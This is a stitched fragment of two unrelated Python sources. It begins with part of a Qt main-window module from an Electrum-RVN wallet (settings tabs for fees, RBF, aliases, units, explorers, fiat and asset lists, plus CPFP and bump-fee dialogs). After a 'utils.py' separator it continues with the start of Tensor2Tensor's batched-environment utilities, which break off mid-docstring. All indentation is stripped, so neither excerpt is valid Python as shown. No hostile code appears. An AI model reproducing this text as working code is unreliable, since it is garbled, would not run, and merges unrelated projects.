if not self.config.is_modifiable('num_zeros'):
for w in [nz, nz_label]: w.setEnabled(False)
def on_nz():
value = nz.value()
if self.num_zeros != value:
self.num_zeros = value
self.config.set_key('num_zeros', value, True)
self.history_list.update()
self.address_list.update()
nz.valueChanged.connect(on_nz)
gui_widgets.append((nz_label, nz))
msg = '\n'.join([
_('Time based: fee rate is based on average confirmation time estimates'),
_('Mempool based: fee rate is targeting a depth in the memory pool')
]
)
fee_type_label = HelpLabel(_('Fee estimation') + ':', msg)
fee_type_combo = QComboBox()
fee_type_combo.addItems([_('Static'), _('ETA'), _('Mempool')])
fee_type_combo.setCurrentIndex((2 if self.config.use_mempool_fees() else 1) if self.config.is_dynfee() else 0)
def on_fee_type(x):
self.config.set_key('mempool_fees', x==2)
self.config.set_key('dynamic_fees', x>0)
self.fee_slider.update()
fee_type_combo.currentIndexChanged.connect(on_fee_type)
fee_widgets.append((fee_type_label, fee_type_combo))
feebox_cb = QCheckBox(_('Edit fees manually'))
feebox_cb.setChecked(self.config.get('show_fee', False))
feebox_cb.setToolTip(_("Show fee edit box in send tab."))
def on_feebox(x):
self.config.set_key('show_fee', x == Qt.Checked)
self.fee_adv_controls.setVisible(bool(x))
feebox_cb.stateChanged.connect(on_feebox)
fee_widgets.append((feebox_cb, None))
use_rbf = self.config.get('use_rbf', False)
use_rbf_cb = QCheckBox(_('Use Replace-By-Fee'))
use_rbf_cb.setChecked(use_rbf)
use_rbf_cb.setToolTip(
_('If you check this box, your transactions will be marked as non-final,') + '\n' + \
_('and you will have the possibility, while they are unconfirmed, to replace them with transactions that pay higher fees.') + '\n' + \
_('Note that some merchants do not accept non-final transactions until they are confirmed.'))
def on_use_rbf(x):
self.config.set_key('use_rbf', bool(x))
batch_rbf_cb.setEnabled(bool(x))
use_rbf_cb.stateChanged.connect(on_use_rbf)
#fee_widgets.append((use_rbf_cb, None))
batch_rbf_cb = QCheckBox(_('Batch RBF transactions'))
batch_rbf_cb.setChecked(self.config.get('batch_rbf', False))
batch_rbf_cb.setEnabled(use_rbf)
batch_rbf_cb.setToolTip(
_('If you check this box, your unconfirmed transactions will be consolidated into a single transaction.') + '\n' + \
_('This will save fees.'))
def on_batch_rbf(x):
self.config.set_key('batch_rbf', bool(x))
batch_rbf_cb.stateChanged.connect(on_batch_rbf)
fee_widgets.append((batch_rbf_cb, None))
msg = _('OpenAlias record, used to receive coins and to sign payment requests.') + '\n\n'\
+ _('The following alias providers are available:') + '\n'\
+ '\n'.join(['https://cryptoname.co/', 'http://xmr.link']) + '\n\n'\
+ 'For more information, see https://openalias.org'
alias_label = HelpLabel(_('OpenAlias') + ':', msg)
alias = self.config.get('alias','')
alias_e = QLineEdit(alias)
def set_alias_color():
if not self.config.get('alias'):
alias_e.setStyleSheet("")
return
if self.alias_info:
alias_addr, alias_name, validated = self.alias_info
alias_e.setStyleSheet((ColorScheme.GREEN if validated else ColorScheme.RED).as_stylesheet(True))
else:
alias_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True))
def on_alias_edit():
alias_e.setStyleSheet("")
alias = str(alias_e.text())
self.config.set_key('alias', alias, True)
if alias:
self.fetch_alias()
set_alias_color()
self.alias_received_signal.connect(set_alias_color)
alias_e.editingFinished.connect(on_alias_edit)
id_widgets.append((alias_label, alias_e))
# SSL certificate
msg = ' '.join([
_('SSL certificate used to sign payment requests.'),
_('Use setconfig to set ssl_chain and ssl_privkey.'),
])
if self.config.get('ssl_privkey') or self.config.get('ssl_chain'):
try:
SSL_identity = paymentrequest.check_ssl_config(self.config)
SSL_error = None
except BaseException as e:
SSL_identity = "error"
SSL_error = str(e)
else:
SSL_identity = ""
SSL_error = None
SSL_id_label = HelpLabel(_('SSL certificate') + ':', msg)
SSL_id_e = QLineEdit(SSL_identity)
SSL_id_e.setStyleSheet((ColorScheme.RED if SSL_error else ColorScheme.GREEN).as_stylesheet(True) if SSL_identity else '')
if SSL_error:
SSL_id_e.setToolTip(SSL_error)
SSL_id_e.setReadOnly(True)
id_widgets.append((SSL_id_label, SSL_id_e))
units = base_units_list
msg = (_('Base unit of your wallet.')
+ '\n1 RVN = 1000 mRVN. 1 mRVN = 1000 bits. 1 bit = 100 sat.\n'
+ _('This setting affects the Send tab, and all balance related fields.'))
unit_label = HelpLabel(_('Base unit') + ':', msg)
unit_combo = QComboBox()
unit_combo.addItems(units)
unit_combo.setCurrentIndex(units.index(self.base_unit()))
def on_unit(x, nz):
unit_result = units[unit_combo.currentIndex()]
if self.base_unit() == unit_result:
return
edits = self.amount_e, self.fee_e, self.receive_amount_e
amounts = [edit.get_amount() for edit in edits]
self.decimal_point = base_unit_name_to_decimal_point(unit_result)
self.config.set_key('decimal_point', self.decimal_point, True)
nz.setMaximum(self.decimal_point)
self.history_list.update()
self.request_list.update()
self.address_list.update()
for edit, amount in zip(edits, amounts):
edit.setAmount(amount)
self.update_status()
unit_combo.currentIndexChanged.connect(lambda x: on_unit(x, nz))
gui_widgets.append((unit_label, unit_combo))
block_explorers = sorted(util.block_explorer_info().keys())
msg = _('Choose which online block explorer to use for functions that open a web browser')
block_ex_label = HelpLabel(_('Online Block Explorer') + ':', msg)
block_ex_combo = QComboBox()
block_ex_combo.addItems(block_explorers)
block_ex_combo.setCurrentIndex(block_ex_combo.findText(util.block_explorer(self.config)))
def on_be(x):
be_result = block_explorers[block_ex_combo.currentIndex()]
self.config.set_key('block_explorer', be_result, True)
block_ex_combo.currentIndexChanged.connect(on_be)
gui_widgets.append((block_ex_label, block_ex_combo))
ipfs_explorers = sorted(util.ipfs_explorer_info().keys())
msg = _('Choose which online IPFS explorer to use for functions that open a web browser')
ipfs_ex_label = HelpLabel(_('Online IPFS Explorer') + ':', msg)
ipfs_ex_combo = QComboBox()
ipfs_ex_combo.addItems(ipfs_explorers)
ipfs_ex_combo.setCurrentIndex(ipfs_ex_combo.findText(util.ipfs_explorer(self.config)))
def on_ie(x):
ie_result = ipfs_explorers[ipfs_ex_combo.currentIndex()]
self.config.set_key('ipfs_explorer', ie_result, True)
ipfs_ex_combo.currentIndexChanged.connect(on_ie)
gui_widgets.append((ipfs_ex_label, ipfs_ex_combo))
from electrum import qrscanner
system_cameras = qrscanner._find_system_cameras()
qr_combo = QComboBox()
qr_combo.addItem("Default","default")
for camera, device in system_cameras.items():
qr_combo.addItem(camera, device)
#combo.addItem("Manually specify a device", config.get("video_device"))
index = qr_combo.findData(self.config.get("video_device"))
qr_combo.setCurrentIndex(index)
msg = _("Install the zbar package to enable this.")
qr_label = HelpLabel(_('Video Device') + ':', msg)
qr_combo.setEnabled(qrscanner.libzbar is not None)
on_video_device = lambda x: self.config.set_key("video_device", qr_combo.itemData(x), True)
qr_combo.currentIndexChanged.connect(on_video_device)
gui_widgets.append((qr_label, qr_combo))
colortheme_combo = QComboBox()
colortheme_combo.addItem(_('Light'), 'default')
colortheme_combo.addItem(_('Dark'), 'dark')
index = colortheme_combo.findData(self.config.get('qt_gui_color_theme', 'dark'))
colortheme_combo.setCurrentIndex(index)
colortheme_label = QLabel(_('Color theme') + ':')
def on_colortheme(x):
self.config.set_key('qt_gui_color_theme', colortheme_combo.itemData(x), True)
self.need_restart = True
colortheme_combo.currentIndexChanged.connect(on_colortheme)
gui_widgets.append((colortheme_label, colortheme_combo))
updatecheck_cb = QCheckBox(_("Automatically check for software updates"))
updatecheck_cb.setChecked(self.config.get('check_updates', False))
def on_set_updatecheck(v):
self.config.set_key('check_updates', v == Qt.Checked, save=True)
updatecheck_cb.stateChanged.connect(on_set_updatecheck)
gui_widgets.append((updatecheck_cb, None))
filelogging_cb = QCheckBox(_("Write logs to file"))
filelogging_cb.setChecked(bool(self.config.get('log_to_file', False)))
def on_set_filelogging(v):
self.config.set_key('log_to_file', v == Qt.Checked, save=True)
self.need_restart = True
filelogging_cb.stateChanged.connect(on_set_filelogging)
filelogging_cb.setToolTip(_('Debug logs can be persisted to disk. These are useful for troubleshooting.'))
gui_widgets.append((filelogging_cb, None))
usechange_cb = QCheckBox(_('Use change addresses'))
usechange_cb.setChecked(self.wallet.use_change)
if not self.config.is_modifiable('use_change'): usechange_cb.setEnabled(False)
def on_usechange(x):
usechange_result = x == Qt.Checked
if self.wallet.use_change != usechange_result:
self.wallet.use_change = usechange_result
self.wallet.storage.put('use_change', self.wallet.use_change)
multiple_cb.setEnabled(self.wallet.use_change)
usechange_cb.stateChanged.connect(on_usechange)
usechange_cb.setToolTip(_('Using change addresses makes it more difficult for other people to track your transactions.'))
tx_widgets.append((usechange_cb, None))
def on_multiple(x):
multiple = x == Qt.Checked
if self.wallet.multiple_change != multiple:
self.wallet.multiple_change = multiple
self.wallet.storage.put('multiple_change', multiple)
multiple_change = self.wallet.multiple_change
multiple_cb = QCheckBox(_('Use multiple change addresses'))
multiple_cb.setEnabled(self.wallet.use_change)
multiple_cb.setToolTip('\n'.join([
_('In some cases, use up to 3 change addresses in order to break '
'up large coin amounts and obfuscate the recipient address.'),
_('This may result in higher transactions fees.')
]))
multiple_cb.setChecked(multiple_change)
multiple_cb.stateChanged.connect(on_multiple)
tx_widgets.append((multiple_cb, None))
def fmt_docs(key, klass):
lines = [ln.lstrip(" ") for ln in klass.__doc__.split("\n")]
return '\n'.join([key, "", " ".join(lines)])
choosers = sorted(coinchooser.COIN_CHOOSERS.keys())
if len(choosers) > 1:
chooser_name = coinchooser.get_name(self.config)
msg = _('Choose coin (UTXO) selection method. The following are available:\n\n')
msg += '\n\n'.join(fmt_docs(*item) for item in coinchooser.COIN_CHOOSERS.items())
chooser_label = HelpLabel(_('Coin selection') + ':', msg)
chooser_combo = QComboBox()
chooser_combo.addItems(choosers)
i = choosers.index(chooser_name) if chooser_name in choosers else 0
chooser_combo.setCurrentIndex(i)
def on_chooser(x):
chooser_name = choosers[chooser_combo.currentIndex()]
self.config.set_key('coin_chooser', chooser_name)
chooser_combo.currentIndexChanged.connect(on_chooser)
tx_widgets.append((chooser_label, chooser_combo))
def on_unconf(x):
self.config.set_key('confirmed_only', bool(x))
conf_only = self.config.get('confirmed_only', False)
unconf_cb = QCheckBox(_('Spend only confirmed coins'))
unconf_cb.setToolTip(_('Spend only confirmed inputs.'))
unconf_cb.setChecked(conf_only)
unconf_cb.stateChanged.connect(on_unconf)
tx_widgets.append((unconf_cb, None))
def on_outrounding(x):
self.config.set_key('coin_chooser_output_rounding', bool(x))
enable_outrounding = self.config.get('coin_chooser_output_rounding', False)
outrounding_cb = QCheckBox(_('Enable output value rounding'))
outrounding_cb.setToolTip(
_('Set the value of the change output so that it has similar precision to the other outputs.') + '\n' +
_('This might improve your privacy somewhat.') + '\n' +
_('If enabled, at most 100 satoshis might be lost due to this, per transaction.'))
outrounding_cb.setChecked(enable_outrounding)
outrounding_cb.stateChanged.connect(on_outrounding)
tx_widgets.append((outrounding_cb, None))
# Fiat Currency
hist_checkbox = QCheckBox()
hist_capgains_checkbox = QCheckBox()
fiat_address_checkbox = QCheckBox()
ccy_combo = QComboBox()
ex_combo = QComboBox()
def update_currencies():
if not self.fx: return
currencies = sorted(self.fx.get_currencies(self.fx.get_history_config()))
ccy_combo.clear()
ccy_combo.addItems([_('None')] + currencies)
if self.fx.is_enabled():
ccy_combo.setCurrentIndex(ccy_combo.findText(self.fx.get_currency()))
def update_history_cb():
if not self.fx: return
hist_checkbox.setChecked(self.fx.get_history_config())
hist_checkbox.setEnabled(self.fx.is_enabled())
def update_fiat_address_cb():
if not self.fx: return
fiat_address_checkbox.setChecked(self.fx.get_fiat_address_config())
def update_history_capgains_cb():
if not self.fx: return
hist_capgains_checkbox.setChecked(self.fx.get_history_capital_gains_config())
hist_capgains_checkbox.setEnabled(hist_checkbox.isChecked())
def update_exchanges():
if not self.fx: return
b = self.fx.is_enabled()
ex_combo.setEnabled(b)
if b:
h = self.fx.get_history_config()
c = self.fx.get_currency()
exchanges = self.fx.get_exchanges_by_ccy(c, h)
else:
exchanges = self.fx.get_exchanges_by_ccy('USD', False)
ex_combo.blockSignals(True)
ex_combo.clear()
ex_combo.addItems(sorted(exchanges))
ex_combo.setCurrentIndex(ex_combo.findText(self.fx.config_exchange()))
ex_combo.blockSignals(False)
def on_currency(hh):
if not self.fx: return
b = bool(ccy_combo.currentIndex())
ccy = str(ccy_combo.currentText()) if b else None
self.fx.set_enabled(b)
if b and ccy != self.fx.ccy:
self.fx.set_currency(ccy)
update_history_cb()
update_exchanges()
self.update_fiat()
def on_exchange(idx):
exchange = str(ex_combo.currentText())
if self.fx and self.fx.is_enabled() and exchange and exchange != self.fx.exchange.name():
self.fx.set_exchange(exchange)
def on_history(checked):
if not self.fx: return
self.fx.set_history_config(checked)
update_exchanges()
self.history_model.refresh('on_history')
if self.fx.is_enabled() and checked:
self.fx.trigger_update()
update_history_capgains_cb()
def on_history_capgains(checked):
if not self.fx: return
self.fx.set_history_capital_gains_config(checked)
self.history_model.refresh('on_history_capgains')
def on_fiat_address(checked):
if not self.fx: return
self.fx.set_fiat_address_config(checked)
self.address_list.refresh_headers()
self.address_list.update()
update_currencies()
update_history_cb()
update_history_capgains_cb()
update_fiat_address_cb()
update_exchanges()
ccy_combo.currentIndexChanged.connect(on_currency)
hist_checkbox.stateChanged.connect(on_history)
hist_capgains_checkbox.stateChanged.connect(on_history_capgains)
fiat_address_checkbox.stateChanged.connect(on_fiat_address)
ex_combo.currentIndexChanged.connect(on_exchange)
fiat_widgets = []
fiat_widgets.append((QLabel(_('Fiat currency')), ccy_combo))
fiat_widgets.append((QLabel(_('Show history rates')), hist_checkbox))
fiat_widgets.append((QLabel(_('Show capital gains in history')), hist_capgains_checkbox))
fiat_widgets.append((QLabel(_('Show Fiat balance for addresses')), fiat_address_checkbox))
fiat_widgets.append((QLabel(_('Source')), ex_combo))
# Asset black list
self.need_write_blacklist = False
msg = 'A list of regular expressions separated by new lines. ' \
'If an asset\'s name matches any regular expression in this list, ' \
'it will be hidden from view.'
regex_b = '\n'.join(self.asset_blacklist)
blacklist_info = HelpLabel(_('Asset Blacklist') + ':', msg)
regex_e_b = QTextEdit()
regex_e_b.setLineWrapMode(QTextEdit.NoWrap)
regex_e_b.setPlainText(regex_b)
def update_blacklist():
self.asset_blacklist = regex_e_b.toPlainText().split('\n')
if not self.asset_blacklist[0]: # We don't want an empty string, we want an empty regex
self.asset_blacklist = []
self.need_write_blacklist = True
regex_e_b.textChanged.connect(update_blacklist)
asset_widgets.append((blacklist_info, regex_e_b))
# Asset white list
self.need_write_whitelist = False
msg = 'A list of regular expressions seperated by new lines. ' \
'Assets that match any of these regular expressions and would normally ' \
'be blocked by the blacklist are shown.'
regex_w = '\n'.join(self.asset_whitelist)
whitelist_info = HelpLabel(_('Asset Whitelist') + ':', msg)
regex_e_w = QTextEdit()
regex_e_w.setLineWrapMode(QTextEdit.NoWrap)
regex_e_w.setPlainText(regex_w)
def update_whitelist():
self.asset_whitelist = regex_e_w.toPlainText().split('\n')
if not self.asset_whitelist[0]:
self.asset_whitelist = []
self.need_write_whitelist = True
regex_e_w.textChanged.connect(update_whitelist)
asset_widgets.append((whitelist_info, regex_e_w))
show_spam_cb = QCheckBox(_("Show assets hidden from view"))
show_spam_cb.setChecked(self.config.get('show_spam_assets', False))
def on_set_show_spam(v):
self.config.set_key('show_spam_assets', v == Qt.Checked, save=True)
self.asset_list.update()
self.history_model.refresh('Toggled show spam assets')
show_spam_cb.stateChanged.connect(on_set_show_spam)
asset_widgets.append((show_spam_cb, None))
tabs_info = [
(fee_widgets, _('Fees')),
(tx_widgets, _('Transactions')),
(gui_widgets, _('General')),
(asset_widgets, _('Assets')),
(fiat_widgets, _('Fiat')),
(id_widgets, _('Identity')),
]
for widgets, name in tabs_info:
tab = QWidget()
grid = QGridLayout(tab)
grid.setColumnStretch(0,1)
for a,b in widgets:
i = grid.rowCount()
if b:
if a:
grid.addWidget(a, i, 0)
grid.addWidget(b, i, 1)
else:
grid.addWidget(a, i, 0, 1, 2)
tabs.addTab(tab, name)
vbox.addWidget(tabs)
vbox.addStretch(1)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
# run the dialog
d.exec_()
if self.fx:
self.fx.trigger_update()
self.alias_received_signal.disconnect(set_alias_color)
if self.need_write_blacklist:
self.config.set_key('asset_blacklist', self.asset_blacklist, True)
if self.need_write_whitelist:
self.config.set_key('asset_whitelist', self.asset_whitelist, True)
if self.need_write_blacklist or self.need_write_whitelist:
self.asset_list.update()
self.history_model.refresh('Changed asset white or black list')
run_hook('close_settings_dialog')
if self.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.network.unregister_callback(self.on_quotes)
self.network.unregister_callback(self.on_history)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.config.set_key("console-history", self.console.history[-50:],
True)
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def logview_dialog(self):
from electrum.logging import get_logfile_path, electrum_logger
def watch_file(fn,logviewer):
# poor man's tail
if os.path.exists(fn):
mtime = os.path.getmtime(fn)
if mtime > self.logfile_mtime:
# file modified
self.logfile_mtime = mtime
logviewer.clear()
with open(fn,"r") as f:
for line in f:
logviewer.append(line.partition('Z |')[2].lstrip(' ').rstrip('\n'))
d = WindowModalDialog(self, _('Log Viewer'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
self.logviewer = QTextEdit()
self.logviewer.setAcceptRichText(False)
self.logviewer.setReadOnly(True)
self.logviewer.setPlainText("Enable 'Write logs to file' in Preferences -> General and restart Electrum-RVN to view logs here")
layout.addWidget(self.logviewer, 1, 1)
logfile = get_logfile_path()
self.logtimer = QTimer(self)
if logfile is not None:
load_logfile = partial(watch_file,logfile,self.logviewer)
self.logfile_mtime = 0
load_logfile()
self.logtimer.timeout.connect(load_logfile)
self.logtimer.start(2500)
d.exec_()
self.logtimer.stop()
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx, new_tx):
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_fee = self.wallet.get_tx_fee(parent_tx)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
self.show_error(f'''{_("Can't CPFP'")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx):
fee = self.wallet.get_tx_fee(tx)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(tx.txid())
tx_size = tx.estimated_size()
old_fee_rate = fee / tx_size # sat/vbyte
d = WindowModalDialog(self, _('Bump Fee'))
vbox = QVBoxLayout(d)
vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool.")))
vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit()))
vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate)))
vbox.addWidget(QLabel(_('New Fee rate') + ':'))
def on_textedit_rate():
fee_slider.deactivate()
feerate_e = FeerateEdit(lambda: 0)
feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1))
feerate_e.textEdited.connect(on_textedit_rate)
vbox.addWidget(feerate_e)
def on_slider_rate(dyn, pos, fee_rate):
fee_slider.activate()
if fee_rate is not None:
feerate_e.setAmount(fee_rate / 1000)
fee_slider = FeeSlider(self, self.config, on_slider_rate)
fee_slider.deactivate()
vbox.addWidget(fee_slider)
cb = QCheckBox(_('Final'))
vbox.addWidget(cb)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
is_final = cb.isChecked()
new_fee_rate = feerate_e.get_amount()
try:
new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config)
except CannotBumpFee as e:
self.show_error(str(e))
return
#if is_final:
# new_tx.set_rbf(True)
new_tx.set_rbf(False)
self.show_transaction(new_tx, tx_label)
def save_transaction_into_wallet(self, tx):
win = self.top_level_window()
try:
if not self.wallet.add_transaction(tx.txid(), tx):
win.show_error(_("Transaction could not be saved.") + "\n" +
_("It conflicts with current history."))
return False
except AddTransactionException as e:
win.show_error(e)
return False
else:
self.wallet.storage.write()
# need to update at least: history_list, utxo_list, address_list
self.need_update.set()
msg = (_("Transaction added to wallet history.") + '\n\n' +
_("Note: this is an offline transaction, if you want the network "
"to see it, you need to broadcast it."))
win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg)
return True
|
utils.py | # coding=utf-8
# Copyright 2018 The Tensor2Tensor Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utilities for using batched environments."""
# The code was based on Danijar Hafner's code from tf.agents:
# https://github.com/tensorflow/agents/blob/master/agents/tools/wrappers.py
# https://github.com/tensorflow/agents/blob/master/agents/scripts/utility.py
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import atexit
import multiprocessing
import os
import random
import signal
import subprocess
import sys
import traceback
# Dependency imports
import gym
from tensor2tensor.rl.envs import batch_env
from tensor2tensor.rl.envs import py_func_batch_env
from tensor2tensor.rl.envs import simulated_batch_env
import tensorflow as tf
class EvalVideoWrapper(gym.Wrapper):
"""Wrapper for recording videos during eval phase.
This wrapper is designed to record videos via gym.wrappers.Monitor and
simplifying its usage in t2t collect phase.
It alleviate the limitation of Monitor, which doesn't allow reset on an
active environment.
EvalVideoWrapper assumes that only every second trajectory (after every
second reset) will be used by the caller:
- on the "active" runs it behaves as gym.wrappers.Monitor,
- on the "inactive" runs it doesn't call underlying environment and only
returns last seen observation.
Videos are only generated during the active runs.
"""
def __init__(self, env):
super(EvalVideoWrapper, self).__init__(env)
self._reset_counter = 0
self._active = False
self._last_returned = None
def _step(self, action):
if self._active:
self._last_returned = self.env.step(action)
if self._last_returned is None:
raise Exception("Environment stepped before proper reset.")
return self._last_returned
def _reset(self, **kwargs):
self._reset_counter += 1
if self._reset_counter % 2 == 1:
self._active = True
return self.env.reset(**kwargs)
else:
self._active = False
self._last_returned = (self._last_returned[0],
self._last_returned[1],
False, # done = False
self._last_returned[3])
return self._last_returned[0]
class ExternalProcessEnv(object):
"""Step environment in a separate process for lock free parallelism."""
# Message types for communication via the pipe.
_ACCESS = 1
_CALL = 2
_RESULT = 3
_EXCEPTION = 4
_CLOSE = 5
def __init__(self, constructor, xvfb):
"""Step environment in a separate process for lock free parallelism.
The environment will be created in the external process by calling the
specified callable. This can be an environment class, or a function
creating the environment and potentially wrapping it. The returned
environment should not access global variables.
Args:
constructor: Callable that creates and returns an OpenAI gym environment.
xvfb: Frame buffer.
Attributes:
observation_space: The cached observation space of the environment.
action_space: The cached action space of the environment.
"""
self._conn, conn = multiprocessing.Pipe()
if xvfb:
server_id = random.randint(10000, 99999)
auth_file_id = random.randint(10000, 99999999999)
xauthority_path = "/tmp/Xauthority_{}".format(auth_file_id)
command = "Xvfb :{} -screen 0 1400x900x24 -nolisten tcp -auth {}".format(
server_id, xauthority_path)
with open(os.devnull, "w") as devnull:
proc = subprocess.Popen(command.split(), shell=False, stdout=devnull,
stderr=devnull)
atexit.register(lambda: os.kill(proc.pid, signal.SIGKILL))
def constructor_using_xvfb():
os.environ["DISPLAY"] = ":{}".format(server_id)
os.environ["XAUTHORITY"] = xauthority_path
return constructor()
self._process = multiprocessing.Process(
target=self._worker, args=(constructor_using_xvfb, conn))
else:
self._process = multiprocessing.Process(
target=self._worker, args=(constructor, conn))
atexit.register(self.close)
self._process.start()
self._observ_space = None
self._action_space = None
@property
def observation_space(self):
if not self._observ_space:
self._observ_space = self.__getattr__("observation_space")
return self._observ_space
@property
def action_space(self):
if not self._action_space:
self._action_space = self.__getattr__("action_space")
return self._action_space
def __getattr__(self, name):
"""Request an attribute from the environment.
Note that this involves communication with the external process, so it can
be slow.
Args:
name: Attribute to access.
Returns:
Value of the attribute.
"""
self._conn.send((self._ACCESS, name))
return self._receive()
def call(self, name, *args, **kwargs):
"""Asynchronously call a method of the external environment.
Args:
name: Name of the method to call.
*args: Positional arguments to forward to the method.
**kwargs: Keyword arguments to forward to the method.
Returns:
Promise object that blocks and provides the return value when called.
"""
payload = name, args, kwargs
self._conn.send((self._CALL, payload))
return self._receive
def close(self):
"""Send a close message to the external process and join it."""
try:
self._conn.send((self._CLOSE, None))
self._conn.close()
except IOError:
# The connection was already closed.
pass
self._process.join()
def step(self, action, blocking=True):
"""Step the environment.
Args:
action: The action to apply to the environment.
